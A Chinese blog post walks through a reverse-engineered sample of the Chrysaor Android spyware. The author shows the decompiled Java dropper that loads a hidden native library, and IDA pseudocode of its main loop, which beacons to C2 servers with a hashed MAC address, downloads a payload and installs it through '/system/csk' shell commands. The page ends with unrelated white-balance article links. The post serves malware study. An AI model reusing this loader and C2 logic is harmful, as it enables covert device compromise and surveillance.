android malware

最新推荐文章于 2025-04-05 21:48:12 发布
最新推荐文章于 2025-04-05 21:48:12 发布
阅读量1.1k 收藏
点赞数
分类专栏: Android逆向 逆向 文章标签: android malware
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/caiqiiqi/article/details/77490608
版权

来源:
https://github.com/fs0c131y/Android-Malwares/tree/c897dff1796c9cb7f19104e9ce3546d54cd55a45/Chrysaor/

3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86

用JEB看是这样一个结构
先看manifest发现用到了超多权限,然后入口是这里
这里写图片描述
这里写图片描述
反编译得到其Java代码

package com.network.android;

import android.app.Activity;
import android.os.Bundle;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

public class NetworkMain extends Activity {
    public NetworkMain() {
        super();
    }

    protected void onCreate(Bundle arg8) {
        super.onCreate(arg8);
        String v2 = "/data/data/com.network.android/libsgn.so";
        try {
            InputStream v1 = this.getResources().getAssets().open("libsgn.so");
            byte[] v0 = new byte[v1.available()];
            v1.read(v0);
            ByteArrayOutputStream v3 = new ByteArrayOutputStream();
            v3.write(v0);
            v3.close();
            v1.close();
            FileOutputStream v4 = new FileOutputStream(v2);
            v3.writeTo(((OutputStream)v4));
            ((OutputStream)v4).close();
            System.load(v2);
        }
        catch(Throwable v5) {
        }
        catch(Exception v5_1) {
        }
        catch(IOException v5_2) {
        }

        this.finish();
    }
}

发现并没有界面,直接将assets目录下的.so写入android的这个路径
/data/data/com.network.android/libsgn.so,然后用

Syste.load()

加载.so,然后就得转战IDA了。
然而并不会分析,只能看一堆strings
这里写图片描述
哦对了可以看一下JNI_onLoad()
这里写图片描述
发现它调用了fork()然后main()!
看到main的代码很牛啊,然而很多不懂的函数

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  void *v3; // r0@1
  int v4; // r5@2
  int v5; // r7@6
  void *v6; // r5@7
  char *v7; // r0@12
  const char *v8; // r2@12
  const char *v9; // r3@12
  char *v10; // [sp+0h] [bp-4A0h]@0
  char *v11; // [sp+4h] [bp-49Ch]@0
  int v12; // [sp+Ch] [bp-494h]@7
  char *v13; // [sp+10h] [bp-490h]@7
  int v14; // [sp+1Ch] [bp-484h]@1
  int v15; // [sp+20h] [bp-480h]@1
  void *ptr; // [sp+24h] [bp-47Ch]@1
  int v17; // [sp+28h] [bp-478h]@7
  char v18; // [sp+2Ch] [bp-474h]@1
  char v19; // [sp+3Ch] [bp-464h]@1
  char v20; // [sp+60h] [bp-440h]@1
  char s; // [sp+84h] [bp-41Ch]@1
  int v22; // [sp+484h] [bp-1Ch]@1

  v14 = 0;
  v15 = 0;
  v22 = _stack_chk_guard;
  ptr = 0;
  memset(&s, 0, 0x400u);
  memset(&v19, 0, 0x21u);
  memset(&v18, 0, 0xDu);
  v3 = memset(&v20, 0, 0x21u);
  handle_signals(v3);
  g_sleep_time_in_seconds = 30;
  sleep(0x1Eu);
  geteuid();
  while ( 1 )
  {
    v4 = 0;
    if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
    {
      get_random_hexlified_md5(&v19);
      get_mac_address(&v18);
      get_hexlified_md5(&v18, &v20, 12);
      if ( http_send_request_with_get(&v20, &v19, SERVERS, v14) == 1 && http_receive_payload(v14, &ptr, &v15) == 1 )
      {
        socket_disconnect(&v14);
        if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
        {
          v5 = v15;
          v4 = 1;
          if ( v15 > 0 )
          {
            v12 = v14;
            v6 = ptr;
            v13 = SERVERS;
            v17 = 0;
            if ( file_exists("/system/csk", &v17) != 1 )
              goto LABEL_17;
            if ( v17 )
            {
              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1
                || system("/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\"") == -1
                || system("/system/csk \"chmod 711 /mnt/obb/.coldboot_init\"") == -1 )
              {
LABEL_17:
                v4 = 0;
                goto LABEL_18;
              }
              unlink("/data/data/com.network.android/.coldboot_init");
              v7 = &s;
              v8 = "%s";
              v9 = "/mnt/obb/.coldboot_init";
            }
            else
            {
              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 )
                goto LABEL_17;
              v7 = &s;
              v8 = "%s";
              v9 = "/data/data/com.network.android/.coldboot_init";
            }
            if ( snprintf(v7, 0x3FFu, v8, v9, v10, v11) <= 0 )
              goto LABEL_17;
            v10 = &v19;
            v11 = v13;
            v4 = sub_1CF4(v12, &s, v17, &v20);
            if ( v4 != 1 )
              goto LABEL_17;
          }
        }
      }
    }
LABEL_18:
    if ( ptr )
    {
      free(ptr);
      ptr = 0;
    }
    socket_disconnect(&v14);
    if ( v4 == 1 )
      pthread_exit(0);
    sleep(g_sleep_time_in_seconds);
  }
}
MTK AWB 色温曲线的猜想
大熊
03-21 1735
MTK 白平衡坐标系的猜想
色彩(5)AWB 客观标定的工作原理
search7的博客
03-17 395
AWB客观标定的灰度世界算法
【图像处理基石】什么是AWB
最新发布
agito_cheung的博客
04-05 1191
5.1 AI AWB的核心技术方向。
白平衡算法
君子性非异
03-30 1489
常用的几种白平衡算法,可参考白平衡(灰度世界、全反射、色温估计)以及白平衡算法实现。下文代码参考一种简单的图像白平衡计算方法。 感谢以上三位博主的分享。 算法(看起来应该是全反射算法)核心思想:在rgb三通道上分别计算直方图,然后将1%的最大值和最小值设置为255和0,其余值映射到(0, 255)区间内,这样使得每个通道的值均匀分布,以实现简单的颜色平衡。实际测试对偏色比较厉害的图像效果较好。...
自动白平衡(AWB)算法---1,色温曲线
热门推荐
wzwxiaozheng的专栏
08-08 3万+
白平衡算法---色温曲线 本文大体讲解了白平衡的算法流程,适用于想了解和学习白平衡原理的筒子们. 一般情况下要实现AWB算法需要专业的图像和算法基础,本文力图通过多图的方式,深入浅出,降低初学者理解上的门槛,让大家都理解到白平衡算法流程.
自动白平衡技术(AWB
ISP行业的忠实粉丝
07-19 1万+
目录 1、白平衡概念 2、调节白平衡 3、自动白平衡技术 3.1基于图像统计的方法 ​3.2基于学习的方法 4、总结 1、白平衡概念 当人们用眼睛观察自然世界时,在不同的光线下,对相同颜色的感觉基本是相同的,比如在早晨旭日初升时,人们看 个白色的物体 感觉它是白的:而人们在夜晚昏暗的灯光下,看到的白色物体,感觉它仍然是白的,这是由于人类从出生到成长的过程中,大脑己经对不同光线下的物体的彩色还原有了适应性,这种现象称为颜色恒常性。不幸的是, CMOS CCD 等感光器...
3A之自动白平衡AWB)篇
音视频开发进阶
08-25 4505
在手机相机的专业模式中,可以看到有一个白平衡(WB)调节的选项什么是AWB人眼视觉系统具有颜色恒常性的特点,对物体的观察不受光源的影响。本质上是白色的物体,在不同色温,反射光线颜色不同的...
日本人白平衡AWB算法
12-02
这是日本著名相机公司的白平衡算法awb,全是English,希望在专业人士有所帮助,看得懂绝对有用,没用说明你们根本看不懂。
白平衡三种算法.zip
06-06
本次试验推荐实现的三个自动白平衡算法:灰度世界法,完美反射法,动态阈值法。 1.灰度世界算法(Gray World)是以灰度世界假设为基础的,该假设认为对于一幅有着大量色彩变化的图像, R、 G、 B 三个分量的平均值趋于同一个灰度K。 2.原理:完美全反射理论(perfect Reflector)假设图像上最亮点就是白点,并以此白点为参考对图像进行自动白平衡,最亮点定义为R+G+B的最大值。从效果上看,该 算法应该比灰度世界的效果要好些,但是也还是受到Ratio这个参数的影像。特别是第二个图片,过高的Ration导致图片过于泛白。 3.同经典的一些算法相同,算法分为两个步骤:白点检测和白点调整。动态阈值的优点:1、该算法效果非常好;2、对块大小不太敏感,因此非常适合于自动化操作。
基于色温估计的自动白平衡
02-17
基于色温估计的自动白平衡,用opencv编写的,很好用的代码,编译通过.
白平衡常用算法,包含灰色世界法,完美反色法,基于自动阈值处理白平衡的算法等等,都是在win32平台调试执行后
08-10
主要是一些基本的白平衡处理方法,都是常用的几种处理算法,白平衡处理算法很多,,我这里还有做的基于mfc单文档的白平衡算法,
白平衡算法总结
11-17
白平衡算法总结
图像算法白平衡
jzjhome的博客
06-12 897
图像白平衡(White Balance)是图像处理中的一个重要步骤,旨在校正由于不同光源引起的颜色偏移,从而使图像中的白色物体看起来真正呈现为白色。白平衡算法有多种实现方式,但其核心目标都是调整图像的颜色,使得在各种光照条件下都能保持颜色的准确性。
白平衡算法模型(灰度世界、完美反射、自适应自动白平衡
ISP行业的忠实粉丝
09-22 5441
目录 1、灰度世界算法模型 2、完美反射模型 3、自适应自动白平衡算法 该部分的白平衡算法主要是基于一定假设基础上的算法,主要有灰度世界算法模型、完美反射算法模型以及自适应自动白平衡算法模型,该类算法原理比较简单,方便实现,但是当假设不成立的话,方法的效果并不好。 1、灰度世界算法模型 如果一副图像颜色足够丰富的话,那么在已知经典光源下的R、G、B三通道的均值应该等于相等,等于一个“灰色”值,这个灰色值是已知的,通过统计未知光源下的R、G、B三...
白平衡算法实现
剑指天空的博客
06-15 2万+
白平衡是电视摄像领域一个非常重要的概念,通过它可以解决色彩还原和色调处理的一系列问题。白平衡是随着电子影像再现色彩真实而产生的,在专业摄像领域白平衡应用的较早,现在家用电子产品(家用摄像机、数码照相机)中也广泛地使用,然而技术的发展使得白平衡调整变得越来越简单容易,但许多使用者还不甚了解白平衡的工作原理,理解上存在诸多误区。它是实现摄像机图像能精确反映被摄物的色彩状况,有手动白平衡和自动白平衡等方...
相机软件必备:探索自动白平衡算法Awb源代码
资源摘要信息: "自动白平衡算法Awb原代码" 自动白平衡(Auto White Balance,简称AWB)是一种在摄影中广泛使用的技术,用于保证在不同光源下拍摄的照片或视频中的颜色尽可能接近人类视觉感知的真实颜色。自动白平衡...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值